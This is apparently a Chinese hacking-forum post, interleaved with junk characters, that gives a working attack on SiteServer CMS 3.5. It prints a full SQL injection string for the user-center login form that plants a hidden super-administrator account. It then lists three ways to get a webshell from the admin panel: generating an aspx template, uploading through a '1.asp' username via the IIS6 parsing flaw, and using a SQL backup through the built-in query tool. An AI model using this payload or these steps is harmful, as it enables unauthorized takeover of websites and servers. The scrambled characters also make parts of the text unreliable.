经测试秒杀最新的3.5版- j6 N. }- V: }
" Z1 L/ G7 g& B9 j- g* B6 g; Gstieserver官网:www.siteserver.cn$ ]! F. X0 c9 b' b$ V' P+ q1 d5 U' r
0 ~- S9 ^3 t% n7 h
# w1 L& I/ B# c
4 n2 ~/ {" s) H# }% _EXP:
: k% @) P. U2 ~0 `" Y/ ]; C
3 A4 Y4 M2 o6 s直接访问UserCenter/login.aspx, {8 _1 `. B& I! h9 h" P# k
% R& J$ @8 j* {$ s$ f7 o$ @ , l {3 t" H! k y
9 D, W, q0 e, G4 }. }3 E用户名处输入:
* t6 ~3 U R* K: Y. J4 H" V+ D
& a: i5 g. }4 Y) W7 x' y/ P123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
2 E) [ r9 k$ S( Z# D5 w
2 [* f5 s1 }( j; F& q0 ]3 l/ l! ~ B * l: _- e2 J/ W- x) V5 p5 g
- ]# N# |/ L/ i: z- R" L; X
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。) f; E$ f. v( {3 e; q! U# b/ g2 U: B5 M
+ b4 |5 `4 o1 A* J: x) E3 j/ C
" \, A1 ^9 P+ a9 F- c. z# ^3 \
, A5 Y% n/ U! k, s6 B+ _5 n之后再访问后台SiteServer/login.aspx用插入的用户登陆
: u2 o! ^5 O# h+ l, i2 O7 f
" X! R# Q9 R& q1 ^0 q+ L1 K) M 3 y0 O7 A+ j, B! B; V0 V2 O
0 V7 |+ D! h+ p& E1 W P9 l后台拿webshell的三种方法:% d: i2 z9 c# N0 h8 B
. U P0 w! \/ N; |一、, m, l$ ?- \3 r5 }4 r: e1 {$ o+ f
& H) a; A2 F9 C& W/ f2 }, t
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
: U: f3 Q3 d, ^( [7 f. H3 `5 @, O7 |) k G& n8 x* L
二、
$ ^8 ?8 F1 u% c- |) }+ r9 M7 b: \" U8 E8 g+ N
成员权限-》添加用户-》用户名为:1.asp
2 b$ H3 I( h) k% W
, p1 P; X; L+ g, Ohttp://127.0.0.1/usercenter/' e% c4 }3 D E& n2 @1 t
# C$ D! h8 R8 T$ y) \
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell+ A. y" O$ C; M# D( k1 l' i2 }
, d: W1 h6 } f. d(ps:后台添加用户时不会验证是否含有非法字符)4 Y/ @- `* c: O# a2 D2 G6 e
- T: X4 g8 V, U6 `4 y- m三、! v6 i4 q" H M3 X' e0 d7 @
8 Y1 ~/ Z( ]$ b! A4 j系统工具-》实用工具-》机器参数查看
1 F8 H: W: ^0 r可以看到数据库类型、名称,WEB路径
* a& ^/ a4 Y2 O( x; T$ B! G+ D* u- Y6 J: d z
系统工具-》数据库工具-》SQL语句查询
P1 B. K! T7 l9 ?+ H5 K这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。# r( J) @* _5 y' l( \5 j# `( ^5 U
5 q I7 w7 {% O: o* ~/ P" w0 {
|